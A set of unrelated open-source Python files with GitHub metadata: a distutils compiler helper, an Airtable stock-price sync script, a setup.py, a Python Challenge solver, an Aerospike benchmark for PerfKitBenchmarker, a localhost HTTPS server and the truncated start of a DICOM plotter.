    # Otherwise scan pyconfig.h itself for a GCC conditional.
    fn = sysconfig.get_config_h_filename()
    try:
        # It would probably better to read single lines to search.
        # But we do this only once, and it is fast enough
        f = open(fn)
        s = f.read()
        f.close()

    except IOError, exc:
        # if we can't read this file, we cannot say it is wrong
        # the compiler will complain later about this file as missing
        return (CONFIG_H_UNCERTAIN,
                "couldn't read '%s': %s" % (fn, exc.strerror))

    else:
        # "pyconfig.h" contains an "#ifdef __GNUC__" or something similar
        if string.find(s,"__GNUC__") >= 0:
            return (CONFIG_H_OK, "'%s' mentions '__GNUC__'" % fn)
        else:
            return (CONFIG_H_NOTOK, "'%s' does not mention '__GNUC__'" % fn)
def get_versions():
    """ Try to find out the versions of gcc and ld.
        If not possible it returns None for it.
    """
    from distutils.version import StrictVersion
    from distutils.spawn import find_executable
    import re

    gcc_exe = find_executable('gcc')
    if gcc_exe:
        out = os.popen(gcc_exe + ' -dumpversion','r')
        try:
            out_string = out.read()
        finally:
            # Close the pipe even if read() raises.
            out.close()
        # Raw string so \d and \. are regex metacharacters, not string escapes
        # (the non-raw form is a deprecation warning on newer Pythons).
        result = re.search(r'(\d+\.\d+\.\d+)', out_string)
        if result:
            gcc_version = StrictVersion(result.group(1))
        else:
            gcc_version = None
    else:
        gcc_version = None
    # EMX ld has no way of reporting version number, and we use GCC
    # anyway - so we can link OMF DLLs
    ld_version = None
    return (gcc_version, ld_version)
|
{
"content_hash": "94540a340f6d6cf856918fd7b7bb4ea3",
"timestamp": "",
"source": "github",
"line_count": 315,
"max_line_length": 97,
"avg_line_length": 37.63492063492063,
"alnum_prop": 0.5602699283002952,
"repo_name": "nvoron23/socialite",
"id": "f52e63232db1afa9b14ee4a074d57c2a004b2b3d",
"size": "11855",
"binary": false,
"copies": "7",
"ref": "refs/heads/master",
"path": "jython/Lib/distutils/emxccompiler.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "GAP",
"bytes": "35416"
},
{
"name": "Groff",
"bytes": "21"
},
{
"name": "HTML",
"bytes": "111577"
},
{
"name": "Java",
"bytes": "2253475"
},
{
"name": "Python",
"bytes": "10833034"
},
{
"name": "R",
"bytes": "752"
},
{
"name": "Shell",
"bytes": "29299"
},
{
"name": "Visual Basic",
"bytes": "481"
}
],
"symlink_target": ""
}
|
import json
import os.path
from typing import List
from typing import Tuple
from typing import TypeVar
from typing import Dict
import random
import arrow
import attr
import requests
@attr.s
class StockInfo(object):
    """Snapshot of one ticker's latest and historical closing prices."""
    ticker = attr.ib(type=str)              # upper-cased symbol, e.g. 'GOOG'
    price = attr.ib(converter=float)        # latest close
    week_ago = attr.ib(converter=float)     # close ~7 days ago
    mo_ago = attr.ib(converter=float)       # close ~31 days ago
    quarter_ago = attr.ib(converter=float)  # close ~91 days ago
    yr_ago = attr.ib(converter=float)       # close ~365 days ago
    last_updated = attr.ib(type=str)        # date string of the latest close
@attr.s
class PortfolioItem(object):
    """One portfolio position, aggregated across Airtable rows."""
    ticker = attr.ib(type=str)
    # Same stock can be present in multiple rows.
    row_ids = attr.ib(type=list)          # Airtable record ids for this ticker
    count = attr.ib(type=int)             # total share count across rows
    stock_info = attr.ib(type=StockInfo)  # attached later; may be None
T = TypeVar('T')  # Generic Type

# Load API credentials once at import time. Use a context manager so the
# file handle is closed (the previous json.load(open(...)) leaked it).
with open(os.path.expanduser('~/.airtable_keys.json')) as _keys_file:
    config = json.load(_keys_file)
STOCK_INFO_CSV = os.path.expanduser('~/.airtable_stocks.json')
ALPHA_ADVANTAGE_KEY = config['AlphaAdvantage']
AIRTABLE_KEY = config['Airtable']['Key']
AIRTABLE_BASE_ID = config['Airtable']['BaseId']
STOCKS_TABLE_NAME = 'Stocks'
PORTFOLIO_TABLE_NAME = 'Portfolio'
MAX_RPM = 5  # Alpha Vantage free-tier limit: requests per minute
def DateNDaysAgo(n: int) -> str:
    """Return the UTC date *n* days ago as a 'YYYY-MM-DD' string."""
    then = arrow.utcnow().shift(days=-n)
    return then.format('YYYY-MM-DD')
def DictToShuffledList(dct: Dict[str, T]) -> List[Tuple[str, T]]:
    """Return the (key, value) pairs of *dct* in random order."""
    pairs = [(key, value) for key, value in dct.items()]
    random.shuffle(pairs)
    return pairs
# Timestamp of the most recent Alpha Vantage request (epoch = "never").
last_aa_request_time = arrow.get(1970, 1, 1)


# Alpha advantage has a MAX_RPS. This must be called before making API call.
def GetAlphaAdvantageApproval():
    """Block until the MAX_RPM rate-limit budget allows another API call."""
    global last_aa_request_time
    global MAX_RPM
    # Earliest instant the next request is allowed (spacing = 60/MAX_RPM s,
    # rounded up by one second).
    next_allowed_time = last_aa_request_time.shift(seconds=int(1 + (60.0 / MAX_RPM)))
    if next_allowed_time < arrow.utcnow():
        print('{} No Wait'.format(arrow.utcnow()))
        last_aa_request_time = arrow.utcnow()
        return
    wait_time = next_allowed_time - arrow.utcnow()
    import time
    print('{} Start Wait. Waiting for '.format(arrow.utcnow()), wait_time)
    time.sleep(wait_time.total_seconds())
    print('{} End Wait'.format(arrow.utcnow()))
    last_aa_request_time = arrow.utcnow()
def CleanupAlphaAdvantageResponse(response):
    """Recursively normalize an Alpha Vantage JSON payload.

    - Keys are lower-cased, the "N. " prefix is stripped, parentheses become
      spaces, and remaining whitespace collapses to underscores.
    - Per-day fields in ignore_keys are dropped; 'adjusted_close' values are
      converted to float.
    - A dict left with exactly one entry is unwrapped to that value, which
      collapses {"date": {"adjusted_close": x}} down to {"date": x}.
    """
    def transform_key(key):
        import re
        key = key.lower()
        key = re.sub(r'^\d+\.\s+', '', key)  # drop the "1. " style prefix
        key = re.sub(r'[()]', ' ', key)
        key = key.strip()
        key = re.sub(r'\s+', '_', key)
        return key

    numeric_keys = {'adjusted_close'}
    ignore_keys = {'open', 'high', 'low', 'close', 'volume', 'dividend_amount', 'split_coefficient',
                   'meta_data'}
    # Fixed: use isinstance() (as the dict branch below already does) instead
    # of `type(response) == list`, so list subclasses are handled too.
    if isinstance(response, list):
        return [CleanupAlphaAdvantageResponse(item) for item in response]
    elif isinstance(response, dict):
        transformed = {transform_key(key): CleanupAlphaAdvantageResponse(value) for key, value in
                       response.items()}
        transformed = {k: float(v) if k in numeric_keys else v for k, v in transformed.items() if
                       k not in ignore_keys}
        if len(transformed) == 1:
            return list(transformed.values())[0]
        else:
            return transformed
    else:
        # Scalars (strings/numbers) pass through unchanged.
        return response
def GetStockInfo(ticker, existing_stock_info):
    """Fetch daily adjusted closes for *ticker* and build a StockInfo.

    Falls back to the cached entry in *existing_stock_info* (or None)
    when the API call fails or returns an unexpected payload.
    """
    ticker = ticker.upper()
    GetAlphaAdvantageApproval()
    params = {'function': 'TIME_SERIES_DAILY_ADJUSTED',
              'symbol': ticker,
              'apikey': ALPHA_ADVANTAGE_KEY,
              'outputsize': 'full'}
    raw = requests.get(url='https://www.alphavantage.co/query',
                       params=params).json()
    close_prices = CleanupAlphaAdvantageResponse(raw)
    if not close_prices or not isinstance(close_prices, dict):
        print('{} Fail {}'.format(arrow.utcnow(), ticker))
        # This request failed. If we have old data, return it.
        return existing_stock_info.get(ticker, None)
    print('{} Success {}'.format(arrow.utcnow(), ticker))

    dates_newest_first = sorted(close_prices.keys(), reverse=True)

    def nearest_close_price(days_ago):
        # Markets close on weekends/holidays, so walk back to the most
        # recent trading day at or before the requested date.
        cutoff = DateNDaysAgo(days_ago)
        for market_date in dates_newest_first:
            if market_date <= cutoff:
                return close_prices[market_date]
        return float('nan')

    last_updated = max(close_prices.keys())
    return StockInfo(ticker=ticker,
                     price=close_prices.get(last_updated, float('nan')),
                     last_updated=last_updated,
                     week_ago=nearest_close_price(7),
                     mo_ago=nearest_close_price(31),
                     quarter_ago=nearest_close_price(91),
                     yr_ago=nearest_close_price(365))
def ReadPortfolioTable():
    """Read the Airtable Portfolio table.

    Returns a dict mapping ticker -> PortfolioItem (stock_info left None),
    aggregating rows that share a ticker, or None if the request failed.
    """
    response = requests.get(
        url='https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, PORTFOLIO_TABLE_NAME),
        # Use the configured key rather than a hard-coded (committed) secret.
        params={'api_key': AIRTABLE_KEY}).json()
    if 'records' not in response:
        return None
    ret = dict()
    for record in response['records']:
        # Same stock can be present in multiple rows.
        ticker, count, row_id = record['fields']['Ticker'], record['fields']['Quantity'], record[
            'id']
        if ticker in ret:
            existing = ret[ticker]
            existing.count += count
            existing.row_ids.append(row_id)
        else:
            ret[ticker] = PortfolioItem(ticker=ticker, row_ids=[row_id], count=count,
                                        stock_info=None)
    return ret
def ClearStocksTable():
    """Delete every record from the Airtable Stocks table (no-op on failure)."""
    # Removes all info from stocks table.
    response = requests.get(
        url='https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME),
        # Use the configured key rather than a hard-coded (committed) secret.
        params={'api_key': AIRTABLE_KEY}).json()
    if 'records' not in response:
        return None
    for record in response['records']:
        requests.delete(
            url='https://api.airtable.com/v0/{}/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME,
                                                              record['id']),
            headers={'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)})
def UpdatePortfolioTable(portfolio):
    """Write each position's latest price back to its Airtable rows."""
    auth_header = {'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)}
    for pf_item in portfolio.values():
        if not pf_item.stock_info:
            continue
        # Update portfolio table with the latest stock price.
        payload = {'fields': {'Current Price': pf_item.stock_info.price}}
        for row_id in pf_item.row_ids:
            row_url = 'https://api.airtable.com/v0/{}/{}/{}'.format(
                AIRTABLE_BASE_ID, PORTFOLIO_TABLE_NAME, row_id)
            requests.patch(url=row_url, headers=auth_header, json=payload)
def UpdateStocksTable(portfolio):
    """Rebuild the Airtable Stocks table from *portfolio*."""
    # Delete stocks table data.
    ClearStocksTable()

    # Hoisted out of the loop: the endpoint never changes per item.
    url = 'https://api.airtable.com/v0/{}/{}'.format(AIRTABLE_BASE_ID, STOCKS_TABLE_NAME)

    def historical_price(old_price, current_price):
        # Render "$<old> <pct change>% <up/down arrow>". Defined once here
        # instead of being re-created on every loop iteration.
        old_price, current_price = float(old_price), float(current_price)
        up_down = '⬆️' if (current_price > old_price) else '🔻'
        return '${} {:.1f}% {}'.format(old_price,
                                       abs(current_price - old_price) * 100.0 / old_price,
                                       up_down)

    # Update the stocks table with new data from portfolio.
    for pf_item in portfolio.values():
        if not pf_item.stock_info:
            continue
        stock_info = pf_item.stock_info
        record = {
            'fields': {
                'Name': stock_info.ticker,
                'Price': stock_info.price,
                '1w ago': historical_price(stock_info.week_ago, stock_info.price),
                '1mo ago': historical_price(stock_info.mo_ago, stock_info.price),
                '3mo ago': historical_price(stock_info.quarter_ago, stock_info.price),
                '1yr ago': historical_price(stock_info.yr_ago, stock_info.price),
                'Last updated': stock_info.last_updated,
                'Value Owned': stock_info.price * pf_item.count
            }}
        print(url)
        print(record)
        requests.post(url=url, headers={'Authorization': 'Bearer {}'.format(AIRTABLE_KEY)},
                      json=record)
def WriteStocksToCSV(fn, ticker_to_stocks):
    """Persist the StockInfo values of *ticker_to_stocks* to *fn* as CSV."""
    import csv
    # newline='' is required when handing a file to the csv module; without
    # it, extra blank lines appear on Windows (see csv module docs).
    with open(fn, 'w', newline='') as csvfile:
        csv_writer = csv.DictWriter(csvfile,
                                    fieldnames=[field.name for field in attr.fields(StockInfo)],
                                    delimiter=',')
        csv_writer.writeheader()
        for _, stock in ticker_to_stocks.items():
            csv_writer.writerow(attr.asdict(stock))
def ReadStocksFromCSVOrReturnEmpty(fn):
    """Load cached StockInfo rows from *fn*; any failure yields an empty dict."""
    try:
        import csv
        with open(fn, 'r') as csvfile:
            result = {}
            for row in csv.DictReader(csvfile, delimiter=','):
                result[row['ticker']] = StockInfo(**row)
            return result
    except Exception:
        # Best effort by design: a missing or corrupt cache simply means
        # "no cached data".
        return dict()
def UpdateAirtable():
    """End-to-end sync: read the portfolio, refresh prices, write back."""

    def _attach_stock_info(portfolio_item, stock_info):
        # Adds stock info to the portfolio item.
        portfolio_item.stock_info = stock_info
        return portfolio_item

    # Read: Existing stock info from disk.
    cached_info = ReadStocksFromCSVOrReturnEmpty(STOCK_INFO_CSV)
    # Read: Stocks, Count, Airtable row ids.
    bare_portfolio = ReadPortfolioTable()
    if bare_portfolio is None:
        # Failure reading the portfolio table; nothing to do.
        return
    # Compute: StockInfo for all the stocks and enhance the portfolio info.
    # Shuffle so the same stocks don't get rate limited again and again.
    enriched = {}
    for ticker, folio_item in DictToShuffledList(bare_portfolio):
        enriched[ticker] = _attach_stock_info(
            folio_item, GetStockInfo(ticker, cached_info))
    # Update tables.
    UpdatePortfolioTable(enriched)
    UpdateStocksTable(enriched)
    # Persist the refreshed stock info for the next run.
    WriteStocksToCSV(STOCK_INFO_CSV,
                     {ticker: item.stock_info for ticker, item in
                      enriched.items() if item.stock_info is not None})
# Script entry point: refresh the Airtable tables when run directly.
if __name__ == '__main__':
    UpdateAirtable()
|
{
"content_hash": "f44ffbc5b250dca02946050e7a060ddb",
"timestamp": "",
"source": "github",
"line_count": 268,
"max_line_length": 100,
"avg_line_length": 38.34701492537314,
"alnum_prop": 0.6012454996594336,
"repo_name": "dotslash/MiniProjects",
"id": "90a1590aacb3d24daceab902103c9acf2dcfc562",
"size": "10308",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "archive/AirTableStocks/airtable_stocks.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "24680"
},
{
"name": "Java",
"bytes": "4520"
},
{
"name": "Python",
"bytes": "47813"
}
],
"symlink_target": ""
}
|
import os
import sys
from setuptools import setup, find_packages
from setuptools.command.test import test
class Tox(test):
    """setuptools 'test' command that delegates to tox.

    Makes ``python setup.py test`` run the tox matrix instead of the
    default unittest discovery.
    """

    def finalize_options(self):
        test.finalize_options(self)
        # tox drives its own test discovery; clear setuptools' defaults.
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        # Imported here because tox is only needed (and installed) at test time.
        import tox
        errno = tox.cmdline(self.test_args)
        sys.exit(errno)
# Package registration; `python setup.py test` is routed to tox via the
# Tox command class defined above.
setup(
    name='waapuro',
    description='A dead-simple hiragana and katakana romanization library',
    version='1.0.1',
    author='Kevin Xiwei Zheng',
    author_email='blankplacement+waapuro@gmail.com',
    url='https://github.com/kxz/waapuro',
    license='X11',
    # Trove classifiers: maturity, audience, and supported Python versions.
    classifiers=[
        'Development Status :: 3 - Alpha',
        'Intended Audience :: Developers',
        'License :: OSI Approved :: MIT License',
        'Natural Language :: Japanese',
        'Operating System :: OS Independent',
        'Programming Language :: Python :: 2',
        'Programming Language :: Python :: 2.7',
        'Programming Language :: Python :: 3',
        'Programming Language :: Python :: 3.4',
        'Topic :: Software Development :: Libraries'],
    keywords='japanese kana hiragana katakana romanization',
    packages=find_packages(),
    # `future` supplies Python 2/3 compatibility shims at runtime.
    install_requires=[
        'future'],
    # tox is only needed for `setup.py test`.
    tests_require=[
        'tox'],
    cmdclass={
        'test': Tox})
|
{
"content_hash": "e9a6b484ef85fc316fac30cf3adc76b1",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 75,
"avg_line_length": 28.934782608695652,
"alnum_prop": 0.6153268219383922,
"repo_name": "kxz/waapuro",
"id": "97d052f371ad6c9a487bf3ca5b9a367d67968573",
"size": "1353",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "setup.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "7573"
}
],
"symlink_target": ""
}
|
import re
import zipfile
def main():
    '''
    Hint: zip, now there are pairs
    In the readme.txt:
        welcome to my zipped list.
        hint1: start from 90052
        hint2: answer is inside the zip
    Last nothing = 46145
    Collect the comments
    '''
    nothing = '90052'
    file_ext = '.txt'
    file_pattern = re.compile(r'Next nothing is (\d+)')
    comments = []
    # Use a context manager so the archive's file handle is closed even if
    # a read fails (the original ZipFile was never closed).
    with zipfile.ZipFile('./zip_chall_06/channel.zip') as zf:
        while True:
            filename = nothing + file_ext
            data = zf.read(filename).decode('utf-8')
            # Each member names the next member; stop when the chain ends.
            match = file_pattern.search(data)
            if match:
                nothing = match.group(1)
                comments.append(zf.getinfo(filename).comment.decode('utf-8'))
            else:
                break
    # The per-member ZIP comments spell out the answer.
    print(''.join(comments))
    return 0


if __name__ == '__main__':
    main()
|
{
"content_hash": "34f105f9ed3f0344cc495260f6bc652f",
"timestamp": "",
"source": "github",
"line_count": 43,
"max_line_length": 73,
"avg_line_length": 23.069767441860463,
"alnum_prop": 0.5655241935483871,
"repo_name": "HKuz/PythonChallenge",
"id": "3c754f784bc80017d9e863abf925804b68c87b20",
"size": "1174",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Challenges/chall_06.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "OpenEdge ABL",
"bytes": "5003"
},
{
"name": "Python",
"bytes": "61570"
}
],
"symlink_target": ""
}
|
"""Runs Aerospike (http://www.aerospike.com).
Aerospike is an opensource NoSQL solution. This benchmark runs a read/update
load test with varying numbers of client threads against an Aerospike server.
This test can be run in a variety of configurations including memory only,
remote/persistent ssd, and local ssd. The Aerospike configuration is controlled
by the "aerospike_storage_type" and "data_disk_type" flags.
"""
import re
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import disk
from perfkitbenchmarker import flags
from perfkitbenchmarker import sample
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.linux_packages import aerospike_server
FLAGS = flags.FLAGS
flags.DEFINE_integer('aerospike_min_client_threads', 8,
'The minimum number of Aerospike client threads.',
lower_bound=1)
flags.DEFINE_integer('aerospike_max_client_threads', 128,
'The maximum number of Aerospike client threads.',
lower_bound=1)
flags.DEFINE_integer('aerospike_client_threads_step_size', 8,
'The number to increase the Aerospike client threads by '
'for each iteration of the test.',
lower_bound=1)
flags.DEFINE_integer('aerospike_read_percent', 90,
'The percent of operations which are reads.',
lower_bound=0, upper_bound=100)
flags.DEFINE_integer('aerospike_num_keys', 1000000,
'The number of keys to load Aerospike with. The index '
'must fit in memory regardless of where the actual '
'data is being stored and each entry in the '
'index requires 64 bytes.')
BENCHMARK_NAME = 'aerospike'
BENCHMARK_CONFIG = """
aerospike:
description: Runs Aerospike.
vm_groups:
workers:
vm_spec: *default_single_core
disk_spec: *default_500_gb
vm_count: null
disk_count: 0
client:
vm_spec: *default_single_core
"""
AEROSPIKE_CLIENT = 'https://github.com/aerospike/aerospike-client-c.git'
CLIENT_DIR = 'aerospike-client-c'
CLIENT_VERSION = '4.0.4'
PATCH_FILE = 'aerospike.patch'
def GetConfig(user_config):
  """Load the benchmark config, adding a data disk when one is required."""
  config = configs.LoadConfig(BENCHMARK_CONFIG, user_config, BENCHMARK_NAME)
  # A scratch disk is only needed when Aerospike persists to a remote disk.
  needs_data_disk = (
      FLAGS.aerospike_storage_type == aerospike_server.DISK and
      FLAGS.data_disk_type != disk.LOCAL)
  if needs_data_disk:
    config['vm_groups']['workers']['disk_count'] = 1
  return config
def CheckPrerequisites():
  """Verifies that the required resources are present.

  Raises:
    perfkitbenchmarker.data.ResourceNotFound: On missing resource.
  """
  # Resolving the path raises if the patch file is not bundled with the data.
  data.ResourcePath(PATCH_FILE)
def _PrepareClient(client):
  """Install, patch, and build the Aerospike C client benchmark on *client*."""
  client.Install('build_tools')
  client.Install('lua5_1')
  client.Install('openssl')
  client.RemoteCommand('git clone %s' % AEROSPIKE_CLIENT)
  checkout_and_build = ('cd %s && git checkout %s && git submodule update --init '
                        '&& make') % (CLIENT_DIR, CLIENT_VERSION)
  client.RemoteCommand(checkout_and_build)
  # Apply a patch to the client benchmark so we have access to average latency
  # of requests. Switching over to YCSB should obviate this.
  client.PushDataFile(PATCH_FILE)
  benchmark_dir = '%s/benchmarks/src/main' % CLIENT_DIR
  client.RemoteCommand('cp aerospike.patch %s' % benchmark_dir)
  client.RemoteCommand('cd %s && patch -p1 -f < aerospike.patch'
                       % benchmark_dir)
  # The patched benchmark links against zlib.
  client.RemoteCommand('sed -i -e "s/lpthread/lpthread -lz/" '
                       '%s/benchmarks/Makefile' % CLIENT_DIR)
  client.RemoteCommand('cd %s/benchmarks && make' % CLIENT_DIR)
def Prepare(benchmark_spec):
  """Install Aerospike server on one VM and Aerospike C client on the other.

  Args:
    benchmark_spec: The benchmark specification. Contains all data that is
        required to run the benchmark.
  """
  client_vm = benchmark_spec.vm_groups['client'][0]
  worker_vms = benchmark_spec.vm_groups['workers']
  # All servers join the cluster through the first worker's internal IP.
  seed_ips = [worker_vms[0].internal_ip]

  def _Prepare(vm):
    # The client VM gets the C client; every other VM runs a server.
    if vm == client_vm:
      _PrepareClient(vm)
    else:
      aerospike_server.ConfigureAndStart(vm, seed_ips)

  vm_util.RunThreaded(_Prepare, benchmark_spec.vms)
def Run(benchmark_spec):
  """Runs a read/update load test on Aerospike.

  Loads aerospike_num_keys keys, then sweeps the client thread count from
  aerospike_min_client_threads to aerospike_max_client_threads, recording
  average latency per step and the best TPS seen under 1 ms latency.

  Args:
    benchmark_spec: The benchmark specification. Contains all data that is
        required to run the benchmark.

  Returns:
    A list of sample.Sample objects.
  """
  client = benchmark_spec.vm_groups['client'][0]
  servers = benchmark_spec.vm_groups['workers']
  samples = []

  def ParseOutput(output):
    """Parses Aerospike output.

    Args:
      output: The stdout from running the benchmark.

    Returns:
      A tuple of average TPS and average latency.
    """
    # The benchmark prints rolling stats; the last occurrence is the
    # overall average for the run.
    read_latency = re.findall(
        r'read.*Overall Average Latency \(ms\) ([0-9]+\.[0-9]+)\n', output)[-1]
    write_latency = re.findall(
        r'write.*Overall Average Latency \(ms\) ([0-9]+\.[0-9]+)\n', output)[-1]
    # Weight read and write latency by the configured read percentage.
    average_latency = (
        (FLAGS.aerospike_read_percent / 100.0) * float(read_latency) +
        ((100 - FLAGS.aerospike_read_percent) / 100.0) * float(write_latency))
    # Materialize as a list: under Python 3, map() returns a single-use
    # iterator, which the sum()/len() pair below would otherwise exhaust.
    tps = [int(t) for t in re.findall(r'total\(tps=([0-9]+) ', output)]
    return float(sum(tps)) / len(tps), average_latency

  # Insert-only workload (-w I) to load the initial keyset.
  load_command = ('./%s/benchmarks/target/benchmarks -z 32 -n test -w I '
                  '-o B:1000 -k %s -h %s' %
                  (CLIENT_DIR, FLAGS.aerospike_num_keys,
                   ','.join(s.internal_ip for s in servers)))
  client.RemoteCommand(load_command, should_log=True)

  max_throughput_for_completion_latency_under_1ms = 0.0
  for threads in range(FLAGS.aerospike_min_client_threads,
                       FLAGS.aerospike_max_client_threads + 1,
                       FLAGS.aerospike_client_threads_step_size):
    # 60-second read/update run; the trailing ';:' masks timeout's exit code.
    load_command = ('timeout 60 ./%s/benchmarks/target/benchmarks '
                    '-z %s -n test -w RU,%s -o B:1000 -k %s '
                    '--latency 5,1 -h %s;:' %
                    (CLIENT_DIR, threads, FLAGS.aerospike_read_percent,
                     FLAGS.aerospike_num_keys,
                     ','.join(s.internal_ip for s in servers)))
    stdout, _ = client.RemoteCommand(load_command, should_log=True)
    tps, latency = ParseOutput(stdout)

    metadata = {
        'Average Transactions Per Second': tps,
        'Client Threads': threads,
        'Storage Type': FLAGS.aerospike_storage_type,
        'Read Percent': FLAGS.aerospike_read_percent,
    }
    samples.append(sample.Sample('Average Latency', latency, 'ms', metadata))
    if latency < 1.0:
      max_throughput_for_completion_latency_under_1ms = max(
          max_throughput_for_completion_latency_under_1ms,
          tps)

  samples.append(sample.Sample(
      'max_throughput_for_completion_latency_under_1ms',
      max_throughput_for_completion_latency_under_1ms,
      'req/s'))

  return samples
def Cleanup(benchmark_spec):
  """Cleanup Aerospike.

  Stops every server and removes the Aerospike install trees from all VMs.

  Args:
    benchmark_spec: The benchmark specification. Contains all data that is
        required to run the benchmark.
  """
  client = benchmark_spec.vm_groups['client'][0]
  servers = benchmark_spec.vm_groups['workers']
  client.RemoteCommand('sudo rm -rf aerospike*')

  def _StopServer(server):
    # Stop the daemon via its Makefile target, then wipe the install tree.
    server.RemoteCommand('cd %s && nohup sudo make stop' %
                         aerospike_server.AEROSPIKE_DIR)
    server.RemoteCommand('sudo rm -rf aerospike*')

  vm_util.RunThreaded(_StopServer, servers)
|
{
"content_hash": "ec18776eb5eb20c80b883e404e51c428",
"timestamp": "",
"source": "github",
"line_count": 212,
"max_line_length": 80,
"avg_line_length": 35.83490566037736,
"alnum_prop": 0.6509148348032118,
"repo_name": "xiaolihope/PerfKitBenchmarker-1.7.0",
"id": "4eb25c544a79ce3c877dff62273359102c744c19",
"size": "8208",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "perfkitbenchmarker/linux_benchmarks/aerospike_benchmark.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Lua",
"bytes": "1547"
},
{
"name": "Python",
"bytes": "1727478"
},
{
"name": "Shell",
"bytes": "23457"
}
],
"symlink_target": ""
}
|
'''
Created on Aug 9, 2013

@author: jimzhai

Purpose: article-classification learning module.
training(self, fileName): trains the classifier.
reportPrecision(self, fileName): reports the classifier's precision on the test text.
'''
from pymining.math.text2matrix import Text2Matrix
from pymining.common.global_info import GlobalInfo
from pymining.common.configuration import Configuration
from pymining.preprocessor.chisquare_filter import ChiSquareFilter
from pymining.classifier.naive_bayes import NaiveBayes
class ArticleCategoriesTrain(object):
    """Trains and evaluates a pymining naive-Bayes article classifier."""

    def training(self,fileName,xml_path):
        """Train the chi-square-filtered naive-Bayes model from the labelled
        samples in *fileName*, using the pymining config at *xml_path*."""
        config = Configuration.FromFile(xml_path)
        GlobalInfo.Init(config, "__global__")
        txt2mat = Text2Matrix(config, "__matrix__")
        [trainx, trainy] = txt2mat.CreateTrainMatrix(fileName)
        # Feature selection: keep only chi-square-significant terms.
        chiFilter = ChiSquareFilter(config, "__filter__")
        chiFilter.TrainFilter(trainx, trainy)
        [trainx, trainy] = chiFilter.MatrixFilter(trainx, trainy)
        nbModel = NaiveBayes(config, "naive_bayes")
        nbModel.Train(trainx, trainy)
    # training

    def reportPrecision(self,fileName,xml_path):
        """Print the trained model's precision on the test file *fileName*.

        NOTE(review): unlike training(), this prepends "data/" to fileName —
        confirm callers pass a bare filename here but a full path there.
        """
        # The trailing True flags reload previously trained state.
        config = Configuration.FromFile(xml_path)
        GlobalInfo.Init(config, "__global__", True)
        txt2mat = Text2Matrix(config, "__matrix__", True)
        chiFilter = ChiSquareFilter(config, "__filter__", True)
        nbModel = NaiveBayes(config, "naive_bayes", True)
        [testx, testy] = txt2mat.CreatePredictMatrix("data/"+fileName)
        [testx, testy] = chiFilter.MatrixFilter(testx, testy)
        [resultY, precision] = nbModel.Test(testx, testy)
        print precision
    # reportPrecision
# Train from the bundled keyword samples; the precision check is left disabled.
if __name__ == "__main__":
    ArticleCategoriesTrain().training("data/keywordtrain.txt","conf/articleCategoriesConfiguration.xml")
    #ArticleCategoriesTrain().reportPrecision("test copy.txt")
|
{
"content_hash": "c48f8de376f1421bb49186f5661d461e",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 104,
"avg_line_length": 38.391304347826086,
"alnum_prop": 0.7021517553793885,
"repo_name": "zhaishuai/NewsfeedsService",
"id": "9b7044c28c9a42445a8701a9856e15574e7fe809",
"size": "1853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "NewsfeedsService/NewsfeedsSoftware/article_categories_package/ArticleCategoriesTrain.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "1245"
},
{
"name": "JavaScript",
"bytes": "80280"
},
{
"name": "Python",
"bytes": "216331"
}
],
"symlink_target": ""
}
|
# Minimal HTTPS static-file server (Python 2 modules: BaseHTTPServer /
# SimpleHTTPServer; in Python 3 these merged into http.server).
import BaseHTTPServer, SimpleHTTPServer
import ssl

# Serve the current directory over TLS on localhost:4443. server.pem must
# contain the private key and certificate together.
# NOTE(review): ssl.wrap_socket is deprecated in modern Python in favour of
# SSLContext.wrap_socket — acceptable for this Python 2 demo script.
httpd = BaseHTTPServer.HTTPServer(('localhost', 4443), SimpleHTTPServer.SimpleHTTPRequestHandler)
httpd.socket = ssl.wrap_socket (httpd.socket, certfile='./server.pem', server_side=True)
httpd.serve_forever()
|
{
"content_hash": "2935df11f8e68c0d43d82ba5f82b7d69",
"timestamp": "",
"source": "github",
"line_count": 6,
"max_line_length": 97,
"avg_line_length": 43.5,
"alnum_prop": 0.8045977011494253,
"repo_name": "yukihirai0505/tutorial-program",
"id": "f33813b221cbfd0b235b9f82cd194b5a7187edc8",
"size": "261",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "programming/js/adobe/creative-cloud/web-image-editor-drag-and-drop-master/https-server.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "2253"
},
{
"name": "CMake",
"bytes": "140"
},
{
"name": "CSS",
"bytes": "19009"
},
{
"name": "Dockerfile",
"bytes": "3059"
},
{
"name": "Elixir",
"bytes": "134"
},
{
"name": "Gherkin",
"bytes": "370"
},
{
"name": "Go",
"bytes": "6176"
},
{
"name": "HTML",
"bytes": "47121"
},
{
"name": "Java",
"bytes": "5923"
},
{
"name": "JavaScript",
"bytes": "81136"
},
{
"name": "Objective-C",
"bytes": "3921"
},
{
"name": "PHP",
"bytes": "471"
},
{
"name": "Python",
"bytes": "31498"
},
{
"name": "Rust",
"bytes": "5142"
},
{
"name": "Scala",
"bytes": "66347"
},
{
"name": "Shell",
"bytes": "261"
}
],
"symlink_target": ""
}
|
import logging

import matplotlib.pyplot as plt
from skimage import measure
from mpl_toolkits.mplot3d.art3d import Poly3DCollection


class Plotter(object):
    """Rendering helpers for DICOM scan data: 2-D slice display/export and
